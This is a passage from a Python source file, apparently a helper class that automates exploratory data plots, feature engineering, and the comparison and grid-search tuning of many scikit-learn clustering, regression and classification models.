0)\n fig, ax = plt.subplots(ROWS, COLS, figsize=(size, 4 * ROWS))\n row, col = 0, 0\n for i, feature in enumerate(dfg.columns):\n if col == (COLS - 1):\n row += 1\n plt.subplots_adjust(hspace=0.2, top = 0.92)\n else:\n plt.subplots_adjust(hspace=0.2, top = 0.80)\n col = i % COLS \n cax = ax[row, col] if ROWS > 1 else ax[col]\n if len(unique) <= 10 and len(y_cols) == 1: # discriminate only one-level and few classes cases\n for cat in dfg[y_cols[0]].unique():\n dfg[dfg[y_cols[0]]==cat][feature].hist(bins=30, alpha=0.5, edgecolor='white', ax=cax).set_title(feature)\n else:\n dfg[feature].hist(bins=30, alpha=0.5, edgecolor='white', ax=cax).set_title(feature)\n fig.suptitle('Data Distribution', fontsize=14)\n self.graphs_expl.append(fig)\n plt.show()\n # pairplot and density plot for every column\n if len(unique) <= 10 and len(y_cols) == 1: # discriminate only one-level and few classes cases\n g = sns.pairplot(dfg, hue=y_cols[0], plot_kws={'alpha':0.5, 's': 20})\n handles = g._legend_data.values()\n labels = g._legend_data.keys()\n g._legend.remove()\n g.fig.legend(handles=handles, labels=labels, loc='lower center', ncol=3)\n else:\n g = sns.pairplot(dfg, plot_kws={'alpha':0.5, 's': 20})\n g.fig.set_figwidth(0.75 * size)\n g.fig.set_figheight(0.75 * size)\n plt.subplots_adjust(top = 0.92, bottom=0.08)\n g.fig.suptitle('Pairplot and Density Matrix', fontsize=14)\n self.graphs_expl.append(g.fig)\n plt.show()\n # correlation heatmap matrix\n fig, ax = plt.subplots(figsize=(0.95 * size, 0.95 * size))\n corr = dfg.corr()\n mask = np.zeros_like(corr)\n mask[np.triu_indices_from(mask)] = True\n sns.heatmap(dfg.corr(), ax=ax, mask=mask, annot = True, vmin = -1, vmax = 1, center = 0, cmap = 'RdBu_r')\n plt.xticks(rotation=45)\n plt.yticks(rotation=45)\n plt.title('Correlation Matrix')\n self.graphs_expl.append(fig)\n plt.show()\n\n return None\n\n\n # add higher level and interaction terms to the model\n def calcTerms(self, df, cols):\n if len(cols) > 1:\n product = df[cols].product(axis=1)\n else:\n product = np.sqrt((df[cols]))\n return product\n def addTerms(self, X, y, levels=2, interaction=True, root=False):\n cols = []\n for col in X.columns: #lets add polynomial terms only for valid data types\n if not str(self.X[col].dtype) == 'object' and not str(self.X[col].dtype) == 'string':\n cols.append(col)\n if levels > 1: #higher level terms makes sense only for k > 1\n #calculating a combination of n elements in groups of k with replacement\n n, k = cols, levels\n if interaction:\n for comb in combinations_with_replacement(n,k):\n comb = list(comb)\n self.X['_'.join(comb)] = self.calcTerms(X, comb)\n # or just the polynomial terms if interaction = False\n else:\n for col in cols:\n for order in range(2, k+1):\n comb = [col for elem in range(1, order+1)]\n self.X['_'.join(comb)] = self.calcTerms(X, comb)\n if root:\n for col in cols:\n comb = [col]\n try: # cannot apply root transform to some data types or data values\n self.X['sqroot_'+col] = self.calcTerms(X, comb)\n except:\n pass\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n \n # encode all non numeric features\n def encode(self, encoder='LabelEncoder', who='both'):\n if encoder == 'LabelEncoder':\n le = LabelEncoder() \n for col in self.X.columns:\n if str(self.X[col].dtype) == 'object' or str(self.X[col].dtype) == 'string':\n self.X[col] = le.fit_transform(self.X[col])\n for col in self.y.columns:\n if str(self.y[col].dtype) == 'object' or str(self.y[col].dtype) == 'string':\n self.y[col] = le.fit_transform(self.y[col])\n else:\n #le = OneHotEncoder() \n for col in self.X.columns:\n if str(self.X[col].dtype) == 'object' or str(self.X[col].dtype) == 'string':\n self.X = pd.concat([self.X, pd.get_dummies(self.X[col], prefix=col, dummy_na=True)], axis=1).drop([col], axis=1)\n if who == 'both':\n for col in self.y.columns:\n if str(self.y[col].dtype) == 'object' or str(self.y[col].dtype) == 'string':\n self.y = pd.concat([self.y, pd.get_dummies(self.y[col], prefix=col, dummy_na=True)], axis=1).drop([col], axis=1)\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # auto balance the dataset M \n # only when classes equal or less than 10 classes\n def balance(self, tol, df, y_cols, ig_cols):\n if len(y_cols) == 1:\n y_col = y_cols[0]\n if len(df[y_col].unique()) <= 10:\n size_before = len(df)\n size_smallest = df[y_col].value_counts().min()\n newdf = pd.DataFrame()\n for yclass in df[y_col].unique():\n sample = df.loc[df[y_col]==yclass].sample(size_smallest)\n newdf = pd.concat([newdf, sample], axis=0)\n size_after = len(newdf)\n if (abs(size_after-size_before)/size_before) < tol:\n X_cols = [col for col in newdf.columns if col not in y_cols and col not in ig_cols]\n newdf.reset_index(inplace=True, drop=True)\n self.X = newdf.loc[:, X_cols]\n self.y = newdf.loc[:, y_cols]\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # analyse if this is a regression or classification problem\n # more than 10 classes transforms the process automatically to regression\n def analyse(self, y_cols):\n if len(y_cols) < 1:\n self.strategy = 'clustering'\n else:\n strategy = []\n for y_col in y_cols:\n if len(self.y[y_col].unique()) > 10 or str(self.y[y_col].dtype) == 'float64':\n strategy.append('regression')\n else:\n strategy.append('classification')\n self.strategy = 'regression' if 'regression' in strategy else 'classification'\n # print('Problem identified as', self.strategy)\n return None\n\n\n # dimensionality reduction\n def redux(self, k=10, mode='chi-square', transform='None'):\n if k == 'auto':\n k = 10 # require deeper implementation\n if mode == 'chi-square' and self.X.shape[1] >= k and self.y.shape[1] > 0:\n selector = SelectKBest(chi2, k=k)\n best_features = selector.fit_transform(self.X, self.y)\n mask = selector.get_support(indices=True)\n self.X = self.X.iloc[:,mask]\n elif mode == 'pca' and self.X.shape[1] >= k:\n if transform != 'None':\n scaler = MinMaxScaler() # only minmax supported right now\n self.scalerX_prepca = scaler.fit(self.X)\n scaledX = self.scalerX_prepca.transform(self.X)\n else:\n scaledX = self.X\n self.scalerX_pca = PCA(n_components=k).fit(scaledX)\n X_pca = pd.DataFrame(self.scalerX_pca.transform(scaledX))\n X_pca.columns = ['PC_%d'%(i+1) for i in range(k)]\n self.X = X_pca\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # apply transformation to data\n def transform(self, who, transform, graph=False):\n size = self.graph_width\n if who == 'X':\n if transform == 'None':\n self.scalerX = None \n self.Xt_train = self.X_train\n if len(self.X_test) > 0: self.Xt_test = self.X_test\n if transform == 'Standard' or transform == 'MinMax' or transform == 'Robust':\n if transform == 'Standard':\n self.scalerX = StandardScaler()\n if transform == 'MinMax':\n self.scalerX = MinMaxScaler()\n if transform == 'Robust':\n self.scalerX = RobustScaler()\n self.scalerX.fit(self.X_train)\n self.Xt_train = self.scalerX.transform(self.X_train)\n if len(self.X_test) > 0: self.Xt_test = self.scalerX.transform(self.X_test)\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n if self.Xt_train.shape[1] == 1:\n sns.kdeplot(self.Xt_train[:,0])\n else:\n for i in range(self.Xt_train.shape[1]):\n sns.kdeplot(self.Xt_train[:,i])\n plt.title('X-Features after Transformation (training set)')\n self.graphs_model.append(fig)\n plt.show() \n if who == 'y':\n if transform == 'None':\n self.scalery = None\n self.yt_train = self.y_train \n self.yt_test = self.y_test \n if transform == 'BoxCox':\n # check if negative/null numbers exists\n miny = self.y.min().item()\n # if so, add the average of y_train to all y to avoid invalid data during boxcox transf\n # using the mean makes the model to robust to new and unknown y data\n deslocy = 0 if miny > 0 else (self.y.mean().item() + 1) \n ytransf = self.y_train + deslocy # add offset if necessary\n self.yt_train, lambday = stats.boxcox(ytransf)\n self.scalery = (deslocy, lambday)\n print(self.y_test + deslocy)\n self.yt_test = stats.boxcox(self.y_test + deslocy, lmbda=lambday) \n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n if self.yt_train.shape[1] == 1:\n sns.kdeplot(self.yt_train[:,0])\n else:\n for i in range(self.yt_train.shape[1]):\n sns.kdeplot(self.yt_train[:,i])\n plt.title('y-Features after Transformation (training set)')\n self.graphs_model.append(fig)\n plt.show() \n return None\n \n\n # apply clustering models\n def clustering(self, metric, printt=True, graph=False):\n size = self.graph_width\n X = np.array(self.Xt_train)\n\n # significant model setup differences should be list as different models\n bandwidth = estimate_bandwidth(X, quantile=0.3)\n connectivity = kneighbors_graph(X, n_neighbors=5, include_self=False)\n # make connectivity symmetric\n connectivity = 0.5 * (connectivity + connectivity.T)\n models = {}\n models[\"KMeans K2\"] = kmg(n_clusters=2)\n models[\"KMeans K5\"] = kmg(n_clusters=5)\n models[\"KMeans K10\"] = kmg(n_clusters=10)\n models[\"Mean Shift\"] = msg(bandwidth=bandwidth, bin_seeding=True)\n models[\"Mini Batch K5\"] = mbg(n_clusters=5)\n models[\"Agglomerative Ward K5\"] = acg(n_clusters=5, linkage='ward', connectivity=connectivity)\n models[\"Agglomerative Avg K5\"] = acg(linkage=\"average\", affinity=\"cityblock\", n_clusters=5, connectivity=connectivity)\n models[\"Spectral K5\"] = scg(n_clusters=5, eigen_solver='arpack', affinity=\"nearest_neighbors\")\n models[\"DBScan Euclidean\"] = dbg(eps=0.5, min_samples=10, metric='euclidean')\n models[\"DBScan Manhattan\"] = dbg(eps=0.5, min_samples=10, metric='manhattan')\n models[\"DBScan Cityblock\"] = dbg(eps=0.5, min_samples=10, metric='cityblock')\n models[\"Optics\"] = optg(min_samples=10, xi=0.05, min_cluster_size=0.1)\n models[\"Affinity Propagation\"] = apg(damping=0.9, preference=-200)\n models[\"Birch K5\"] = big(n_clusters=5)\n models[\"Gaussian Mixture K5\"] = gmg(n_components=5, covariance_type='full')\n \n self.models = models\n\n # for clustering methods, evaluation of best model will be delegated visually to the user\n names = []\n et = []\n results = []\n ROWS, COLS = len(models) // 3 + (1 if len(models) % 3 != 0 else 0), 3\n fig, ax = plt.subplots(figsize=(0.85 * size, ROWS * 0.2 * size))\n fig.suptitle('Clustering Analysis', fontsize=18)\n #plt.figure(figsize=(size, ROWS * 0.2 * size))\n plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.93, wspace=.03, hspace=.20)\n plot_num = 1\n for model_name in models:\n start = time.time()\n models[model_name].fit(X)\n if hasattr(models[model_name], 'labels_'):\n y_pred = models[model_name].labels_.astype(np.int)\n else:\n y_pred = models[model_name].predict(X)\n if len(np.unique(y_pred)) > 1:\n results.append(silhouette_score(X, y_pred, metric=metric))\n else:\n results.append(0)\n elapsed = (time.time() - start)\n names.append(model_name)\n et.append(elapsed)\n plt.subplot(ROWS, COLS, plot_num)\n plt.title(model_name, size=14)\n colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',\n '#f781bf', '#a65628', '#984ea3',\n '#999999', '#e41a1c', '#dede00']),\n int(max(y_pred) + 1))))\n # add gray color for outliers (if any)\n colors = np.append(colors, [\"#bbbbbb\"])\n plt.scatter(X[:, 0], X[:, 1], s=10, color=colors[y_pred])\n plt.xticks(())\n plt.yticks(())\n plt.text(.99, .01, ('%.2fs' % elapsed).lstrip('0'), transform=plt.gca().transAxes, size=14, horizontalalignment='right')\n plot_num += 1\n self.graphs_model.append(fig)\n plt.show() \n\n report = pd.DataFrame({'Model': names, 'Elapsed Time': et, 'Score (silhouette)': results})\n report.sort_values(by='Score (silhouette)', ascending=False, inplace=True)\n report.reset_index(inplace=True, drop=True)\n self.report_performance = report\n \n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* CLUSTERING RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n ax.set_xticks(np.arange(len(report)))\n plt.title('Silhouette Comparison')\n plt.plot(report['Score (silhouette)'])\n ax.set_xticklabels(report.Model)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n\n # apply regression models\n def regression(self, metric, folds=10, alphas=[], printt=True, graph=False):\n size = self.graph_width\n\n # significant model setup differences should be list as different models\n models = {}\n models[\"Linear regressor\"] = lr()\n models[\"Lasso regressor\"] = lassor()\n models[\"Lasso CV regressor\"] = lassocvr()\n models[\"Ridge regressor\"] = rr(alpha=0, normalize=True)\n models[\"Ridge CV regressor\"] = rcvr(alphas = alphas)\n models[\"Elastic net regressor\"] = enr()\n models[\"K nearest neighbors regressor K2u\"] = knnr(n_neighbors=2, weights='uniform')\n models[\"K nearest neighbors regressor K2d\"] = knnr(n_neighbors=2, weights='distance')\n models[\"K nearest neighbors regressor K5\"] = knnr(n_neighbors=5)\n models[\"K nearest neighbors regressor K10\"] = knnr(n_neighbors=10)\n models[\"SGD regressor\"] = sgdr(max_iter=10000, warm_start=True)\n models[\"Decision tree regressor\"] = dtr()\n models[\"Decision tree regressor D3\"] = dtr(max_depth=3)\n models[\"Random forest regressor\"] = rfr()\n models[\"Ada boost regressor\"] = abr()\n models[\"Gradient boost regressor\"] = gbr()\n models[\"Support vector regressor RBF\"] = svr()\n models[\"Support vector regressor Linear\"] = svr('linear')\n models[\"Support vector regressor Poly\"] = svr(kernel='poly')\n self.models = models\n\n kf = KFold(n_splits=folds, shuffle=True)\n results = []\n names = []\n et = []\n for model_name in models:\n start = time.time()\n cv_scores = -1 * cross_val_score(models[model_name], self.Xt_train, self.yt_train, cv=kf, scoring=metric) \n results.append(cv_scores)\n names.append(model_name)\n et.append((time.time() - start))\n report = pd.DataFrame({'Model': names, 'Score': results, 'Elapsed Time': et})\n report['Score (avg)'] = report.Score.apply(lambda x: np.sqrt(x).mean())\n report['Score (std)'] = report.Score.apply(lambda x: np.sqrt(x).std())\n report['Score (VC)'] = 100 * report['Score (std)'] / report['Score (avg)']\n report.sort_values(by='Score (avg)', inplace=True)\n report.drop('Score', axis=1, inplace=True)\n report.reset_index(inplace=True, drop=True)\n self.report_performance = report\n \n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* REGRESSION RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Regressor Comparison')\n #ax = fig.add_subplot(111)\n plt.boxplot(results)\n ax.set_xticklabels(names)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n\n # apply classification models\n def classification(self, metric, folds, printt=True, graph=False):\n size = self.graph_width\n\n if len(self.y.iloc[:,0].unique()) > 2:\n struct = 'multiclass'\n else:\n struct = 'binary'\n\n # significant model setup differences should be list as different models\n models = {}\n models[\"Linear discriminant analysis\"] = ldac()\n models[\"Nearest centroid classifier euclidian\"] = ncc(metric='euclidean')\n models[\"Nearest centroid classifier manhattan\"] = ncc(metric='manhattan')\n models[\"K nearest neighbors classifier K2\"] = knnc(n_neighbors=2)\n models[\"K nearest neighbors classifier K5\"] = knnc(n_neighbors=5)\n models[\"K nearest neighbors classifier K10\"] = knnc(n_neighbors=10) \n models[\"Decision tree classifier\"] = dtc()\n models[\"Gaussian naive bayes\"] = gnbc()\n models[\"Bernoulli naive bayes\"] = bnbc(binarize=0.5)\n models[\"Multinomial naive bayes\"] = mnbc()\n models[\"SGD classifier\"] = sgdc(max_iter=10000)\n models[\"Ridge classifier\"] = rc()\n\n if len(self.Xt_train) < 10000:\n models[\"SVM classifier RBF\"] = svc(gamma='scale')\n models[\"SVM classifier Linear\"] = svc(kernel='linear')\n models[\"SVM classifier Poly\"] = svc(kernel='poly')\n\n if self.Xt_train.shape[0] < 10000 or self.Xt_train.shape[1] < 5:\n models[\"Gradient boosting classifier\"] = gbc()\n models[\"Random forest classifier\"] = rfc(n_estimators=100)\n\n if struct == 'multiclass':\n models[\"Logistic classifier multinomial\"] = logitc(multi_class='multinomial', solver='lbfgs')\n models[\"Logistic classifier auto\"] = logitc(multi_class='auto')\n models[\"Logistic One vs Rest\"] = ovrc(logitc())\n models[\"Logistic One vs One\"] = ovoc(logitc())\n\n if struct == 'binary':\n models[\"Logistic classifier\"] = logitc(max_iter=2000)\n\n self.models = models\n\n kf = StratifiedKFold(n_splits=folds, shuffle=True)\n results = []\n names = []\n et = []\n for model_name in models:\n start = time.time()\n cv_scores = cross_val_score(models[model_name], self.Xt_train, self.yt_train, cv=kf, scoring=metric, error_score=np.nan) \n results.append(cv_scores)\n names.append(model_name)\n et.append((time.time() - start))\n #print(model_name, time.time() - start)\n report = pd.DataFrame({'Model': names, 'Score': results, 'Elapsed Time': et})\n report['Score (avg)'] = report.Score.apply(lambda x: x.mean())\n report['Score (std)'] = report.Score.apply(lambda x: x.std())\n report['Score (VC)'] = 100 * report['Score (std)'] / report['Score (avg)']\n report.sort_values(by='Score (avg)', inplace=True, ascending=False)\n report.drop('Score', axis=1, inplace=True)\n report.reset_index(inplace=True, drop=True)\n self.report_performance = report\n\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* CLASSIFICATION RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Classifier Comparison')\n #ax = fig.add_subplot(111)\n plt.boxplot(results)\n ax.set_xticklabels(names)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n \n # residual analysis for regression problems\n def calc_rss(self, residual):\n return float(((residual) ** 2).sum()) \n def calc_rmse(self, y, y_hat):\n return np.sqrt(mean_squared_error(y_hat, y))\n def calc_r2(self, y, y_hat):\n return r2_score(y_hat, y)\n def residual(self, y, y_hat, model_name, printt=True, graph=False):\n size = self.graph_width\n # do some data conversion because of different methods data types\n sample_size = len(y_hat)\n if isinstance(y, pd.DataFrame): \n y = np.array(y.values.ravel())\n y = y.reshape(-1, 1)\n y_hat = np.array(y_hat).reshape(-1, 1)\n res = y - y_hat\n obs = np.arange(1, sample_size+1).reshape(-1, 1)\n\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* RMSE: %.2f'%self.calc_rmse(y, y_hat))\n print('* R2: %.2f'%self.calc_r2(y, y_hat))\n print('* ')\n print(self.report_width * '*', '\\n')\n\n if graph:\n fig, ax = plt.subplots(2, 2, figsize=(size, 0.5 * size))\n fig.suptitle('Residual Analysis', fontsize=14)\n plt.subplots_adjust(hspace=0.32, wspace=0.2)\n # residual by observation, desired behaviour: stability, stochastic\n ax[0][0].scatter(obs, res, marker='o', c= 'r', alpha=0.8, edgecolors='none')\n ax[0][0].plot(obs, res, c= 'k', lw=0.5, alpha=0.8)\n ax[0][0].plot([0, sample_size], [0, 0], c='k')\n ax[0][0].set_title('Residual', size=14)\n # residual normality, desired behaviour: stochastic and normal distributed residual\n a, result = stats.probplot(res.ravel(), plot=ax[0][1], dist='norm')\n _, p = stats.normaltest(res)\n ax[0][1].text(0.2, 0.8, 'r=%.2f\\np-value=%.4f'%(result[2], p), ha='center', va='center', transform=ax[0][1].transAxes)\n ax[0][1].set_title('Normality (pp-plot)', size=14)\n # residual over leverage, desired behaviour: homoscedastic\n ax[1][0].scatter(y_hat, res, marker='o', c= 'r', alpha=0.8, edgecolors='none')\n ax[1][0].plot([0, y_hat.max()], [0, 0], c='k')\n ax[1][0].set_title('Residual vs Fitted', size=14)\n # residual distribution, desired behaviour: normal distributed residual\n ax[1][1].hist(res, density=True, facecolor='b', alpha=0.5, edgecolor='gray')\n rv = stats.norm(res.mean(), res.std())\n x = np.linspace(res.min(), res.max(), 100) \n h = plt.plot(x, rv.pdf(x), c='b', lw=2)\n ax[1][1].set_title('Residual Histogram', size=14)\n self.graphs_model.append(fig)\n plt.show()\n return 'RMSE: %.2f | R2: %.2f' % (self.calc_rmse(y, y_hat), self.calc_r2(y, y_hat))\n\n\n # evaluate some models\n # metric can be any from one of those:\n # - grid search score metrics for sklearn classifiers\n # - grid search score metrics for sklearn regressors\n # - silhouette score metrics for sklearn clustering\n def evaluate(self, test_size=0.2, transformX='None', transformY='None', folds=10, alphas=[], printt=True, graph=False, metric=''):\n self.graphs_model = []\n if self.strategy == 'regression':\n if metric == '': metric = 'neg_mean_squared_error'\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, shuffle=True)\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.transform('y', transformY, graph) #model transf for y_train\n self.regression(metric, folds, alphas, printt, graph)\n elif self.strategy == 'classification':\n if metric == '': metric = 'accuracy'\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, shuffle=True, stratify=self.y)\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.transform('y', transformY, graph) #model transf for y_train\n self.classification(metric, folds, printt, graph)\n elif self.strategy == 'clustering':\n if metric == '': metric = 'euclidean'\n self.X_train = self.X\n self.X_test = pd.DataFrame()\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.clustering(metric, printt, graph)\n return None\n\n\n # given a model, do a grid search for parameters optimization\n def boost(self, model, printt=True, fixed={}): \n\n # n_tests is used to create linspaced values for some grid parameters\n n_tests = 10\n alphas = 10 ** np.linspace(10, -2, n_tests) * 0.5 \n percs = np.linspace(0, 1, n_tests) \n groups = [2, 3, 5, 10]\n pot10 = [1, 10, 100, 1000]\n samples = [5, 10, 30]\n quarts = [0.25, 0.5, 0.75]\n\n params = list(model.get_params().keys())\n grid_params = {}\n\n # use all processors n_jobs=-1 \n # list parameters range for the more common hyper parameters \n if 'n_jobs' in params: grid_params.update({'clf__n_jobs':[-1]})\n if 'shrinkage' in params: grid_params.update({'clf__shrinkage':percs})\n if isinstance(model, sklearn.discriminant_analysis.LinearDiscriminantAnalysis):\n if 'solver' in params: grid_params.update({'clf__solver':['svd','lsqr','eigen']})\n if 'n_neighbors' in params: grid_params.update({'clf__n_neighbors':groups})\n if 'weights' in params: grid_params.update({'clf__weights':['uniform','distance']})\n if isinstance(model, sklearn.neighbors.KNeighborsClassifier):\n if 'metric' in params: grid_params.update({'clf__metric':['euclidean','manhattan','cityblock','minkowski']})\n if 'p' in params: grid_params.update({'clf__p':[1, 2]})\n if 'C' in params: grid_params.update({'clf__C':pot10})\n if 'penalty' in params: grid_params.update({'clf__penalty':['l1','l2','elasticnet','none']})\n if 'multi_class' in params: grid_params.update({'clf__multi_class':['auto','ovr','multinomial']})\n if 'estimator__C' in params: grid_params.update({'clf__C':pot10})\n if 'estimator__penalty' in params: grid_params.update({'clf__penalty':['l1','l2','elasticnet','none']})\n if 'estimator__multi_class' in params: grid_params.update({'clf__multi_class':['auto','ovr','multinomial']})\n if 'kernel' in params: grid_params.update({'clf__kernel':['linear','rbf','sigmoid']})\n if self.strategy == 'classification':\n if 'alpha' in params: grid_params.update({'clf__alphas':alphas})\n if not isinstance(model, sklearn.ensemble.GradientBoostingClassifier):\n if 'loss' in params: grid_params.update({'clf__loss':['hinge','log','modified_huber','squared_hinge','perceptron']})\n if 'criterion' in params: grid_params.update({'clf__criterion':['gini','entropy']})\n if self.strategy == 'regression':\n if 'loss' in params: grid_params.update({'clf__loss':['ls','lad','huber']})\n if 'max_depth' in params: grid_params.update({'clf__max_depth':groups[:-1]})\n if 'min_samples_leaf' in params: grid_params.update({'clf__min_samples_leaf':groups})\n if 'n_estimators' in params: grid_params.update({'clf__n_estimators':pot10})\n if 'n_clusters' in params: grid_params.update({'clf__n_clusters':groups})\n if 'n_components' in params: grid_params.update({'clf__n_components':groups})\n if not isinstance(model, sklearn.cluster.DBSCAN) and self.strategy == 'clustering':\n if 'algorithm' in params: grid_params.update({'clf__algorithm':['full','elkan']})\n if 'eps' in params: grid_params.update({'clf__eps':quarts})\n if 'min_samples' in params: grid_params.update({'clf__min_samples':samples})\n if 'linkage' in params: grid_params.update({'clf__linkage':['ward','complete','average','single']})\n\n if 'k' in fixed.keys():\n if 'n_clusters' in params: grid_params.update({'clf__n_clusters':[fixed['k']]})\n if 'n_components' in params: grid_params.update({'clf__n_components':[fixed['k']]})\n if 'n_neighbors' in params: grid_params.update({'clf__n_neighbors':[fixed['k']]})\n \n # temporary, use this to improve the gridsearch process\n print('Available hyper-parameters', params)\n grid_params = [grid_params]\n print(grid_params, '\\n')\n\n if self.scalerX != 'None':\n pipe = Pipeline([('scl', self.scalerX), ('clf', model)])\n else:\n pipe = Pipeline([('clf', model)])\n \n if self.strategy == 'regression': # and len(grid_params) > 0:\n scores = ['neg_mean_squared_error']\n # scores = ['neg_mean_squared_error']\n for score in scores:\n kfolds = KFold(n_splits=2, shuffle=True)\n cv = kfolds.split(self.X_train, self.y_train)\n gs = GridSearchCV(estimator=pipe, param_grid=grid_params, scoring=score, cv=cv, error_score=0.0)\n gs.fit(self.X_train, self.y_train)\n self.best_model = gs.best_estimator_\n\n elif self.strategy == 'classification': # and len(grid_params) > 0:\n scores = ['accuracy']\n # scores = ['accuracy', 'recall_macro', 'precision_macro']\n for score in scores:\n kfolds = StratifiedKFold(n_splits=2, shuffle=True)\n cv = kfolds.split(self.X_train, self.y_train)\n gs = GridSearchCV(estimator=pipe, param_grid=grid_params, scoring=score, cv=cv, error_score=0.0)\n gs.fit(self.X_train, self.y_train)\n self.best_model = gs.best_estimator_\n\n elif self.strategy == 'clustering': # and len(grid_params) > 0:\n best = model\n best_result = 0\n k = 2\n scores = ['euclidean']\n for score in scores:\n # lets create our own GridSearch for clustering problems\n my_dict = grid_params[0]\n allParams = sorted(my_dict)\n combinations = product(*(my_dict[param] for param in allParams))\n for comb in combinations:\n new_params = {}\n for i, param in enumerate(allParams):\n if param == 'n_clusters' or param == 'n_components':\n k = comb[i]\n new_params.update({param: comb[i]})\n\n # update all tuning parameters and run \n pipe.set_params(**new_params)\n bandwidth = estimate_bandwidth(self.X_train, quantile=0.3)\n connectivity = kneighbors_graph(self.X_train, n_neighbors=k, include_self=False)\n connectivity = 0.5 * (connectivity + connectivity.T)\n pipe.fit(self.X_train)\n if hasattr(pipe, 'labels_'):\n y_pred = pipe.labels_.astype(np.int)\n else:\n y_pred = pipe.predict(self.X_train)\n result = silhouette_score(self.X_train, y_pred, metric=score)\n if result > best_result:\n best_result = result\n best = pipe\n\n self.best_model = best\n self.best_model.best_params_ = new_params\n\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* HYPER-PARAMETER TUNING REPORT\\n*')\n print(\"* SCORING METHOD: %s\" % score)\n if self.strategy == 'regression':\n print('* BEST SCORE: %.3f' % (-gs.best_score_))\n print('* BEST PARAMS:', gs.best_params_)\n if self.strategy == 'classification':\n print('* BEST SCORE: %.1f %%' % (100 * gs.best_score_))\n print('* BEST PARAMS:', gs.best_params_)\n if self.strategy == 'clustering':\n print('* BEST SCORE (silhouette): %.2f' % (best_result))\n print('* BEST PARAMS:', self.best_model.best_params_)\n print('*\\n', self.report_width * '*')\n print(self.best_model)\n\n return None \n\n\n # given a model name, evaluate y_hat/y_pred/clusters and the overall performance of such model\n def optimize(self, model_name, printt=True, graph=False, xy=(0,1), fixed={}):\n self.graphs_model = []\n size = self.graph_width\n model = self.models[model_name]\n self.boost(model, printt, fixed=fixed) # grid search hyper parameters for this model\n \n if self.strategy == 'regression':\n X, y = self.X_test, self.y_test # evaluate using the test subset\n y_hat = self.best_model.predict(X)\n # show residual analysis\n result = self.residual(y, y_hat, model_name, printt, graph)\n if graph:\n # show the correlation between y and y_hat\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Model Overall Performance')\n plt.scatter(y, y_hat, color='g')\n viewer = lr()\n plt.plot(y, viewer.fit(y, y_hat).predict(y), color='k')\n plt.xlabel('Observed')\n plt.ylabel('Predicted')\n self.graphs_model.append(fig)\n plt.show()\n return result\n\n elif self.strategy == 'classification':\n X, y = self.X_test, self.y_test # evaluate using the test subset\n y_pred = self.best_model.predict(X)\n report = classification_report(y, y_pred, output_dict=True)\n sample_size = len(y_pred)\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* ACCURACY: ', round(accuracy_score(y, y_pred)*100, 1), '%')\n print('* ')\n print(self.report_width * '*', '\\n')\n if not graph:\n print(pd.DataFrame(report).T)\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.3 * size))\n plt.title('Confusion Matrix')\n sns.heatmap(confusion_matrix(y, y_pred), annot=True, cmap='YlGn', fmt='d',)\n plt.xlabel('Predicted')\n plt.ylabel('True Class')\n self.graphs_model.append(fig)\n plt.show()\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Classification Report')\n sns.heatmap(pd.DataFrame(report).iloc[0:3].T, annot=True, vmin=0, vmax=1, cmap='BrBG', fmt='.2g')\n plt.xlabel('Score')\n self.graphs_model.append(fig)\n plt.show()\n return 'Accuracy: ' + str(round(accuracy_score(y, y_pred)*100, 1)) + '%'\n \n elif self.strategy == 'clustering':\n X = np.array(self.X_train) # use the same dataset to show the final model\n self.best_model.fit(X)\n if hasattr(self.best_model, 'labels_'):\n y_pred = self.best_model.labels_.astype(np.int)\n else:\n y_pred = self.best_model.predict(X)\n score = silhouette_score(X, y_pred, metric='euclidean')\n sample_size = len(y_pred)\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* SILHOUETTE: ', round(score, 2))\n print('* ')\n print(self.report_width * '*', '\\n')\n 